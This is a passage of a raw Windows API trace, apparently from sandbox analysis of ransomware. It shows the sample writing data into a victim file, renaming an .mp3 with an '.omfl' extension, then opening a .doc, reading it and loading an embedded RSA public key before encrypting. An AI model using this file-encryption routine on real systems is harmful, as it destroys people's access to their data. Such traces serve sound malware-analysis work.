Size=0x210) returned 0xdce0a50 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17280 | out: hHeap=0x4970000) returned 1 [0131.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172b0 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17298 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17268 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17250 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd352c8 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.836] WriteFile (in: hFile=0x610, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0xc252, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0xc252, lpOverlapped=0x0) returned 1 [0131.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.837] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xc257, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.837] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0131.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0131.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdce69c8 [0131.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0131.837] WriteFile (in: hFile=0x610, lpBuffer=0xdce69c8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdce69c8*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.837] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.837] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.838] CloseHandle (hObject=0x610) returned 1 [0131.841] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14728 [0131.841] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8a0) returned 0x74fb288 [0131.841] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0131.841] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\hvBEWg2szb7Ch.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\hvbewg2szb7ch.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\hvBEWg2szb7Ch.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\hvbewg2szb7ch.mp3.omfl")) returned 1 [0131.842] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.842] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.842] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.843] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0131.843] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeef31f30, ftCreationTime.dwHighDateTime=0x1d5e615, ftLastAccessTime.dwLowDateTime=0xe8c95290, ftLastAccessTime.dwHighDateTime=0x1d5dc75, ftLastWriteTime.dwLowDateTime=0xe8c95290, ftLastWriteTime.dwHighDateTime=0x1d5dc75, nFileSizeHigh=0x0, nFileSizeLow=0x6c45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jPn8y.doc", cAlternateFileName="")) returned 1 [0131.844] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.844] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa6) returned 0x74bf8f0 [0131.844] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0131.844] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\jPn8y.doc") returned=".doc" [0131.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\jPn8y.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\jpn8y.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.844] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=27717) returned 1 [0131.844] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.848] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x6c1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.848] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.850] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.850] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x6c45, lpOverlapped=0x0) returned 1 [0131.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.850] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0131.851] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.851] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.851] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.851] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.851] GetLastError () returned 0x0 [0131.852] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.852] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0131.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.852] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.852] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.852] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x6c50) returned 0xdd35410 [0131.852] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd352c8 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17250 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd35310 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17268 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17298 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd172b0 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.853] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17298 | out: hHeap=0x4970000) returned 1 [0131.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172b0 | out: hHeap=0x4970000) returned 1 [0131.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd172b0 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17298 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172b0 | out: hHeap=0x4970000) returned 1 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17298 | out: hHeap=0x4970000) returned 1 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.854] GetCurrentThreadId () returned 0x618 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2e1a0 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.854] GetCurrentThreadId () returned 0x618 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0131.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17298 [0131.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd172b0 [0131.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17280 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) 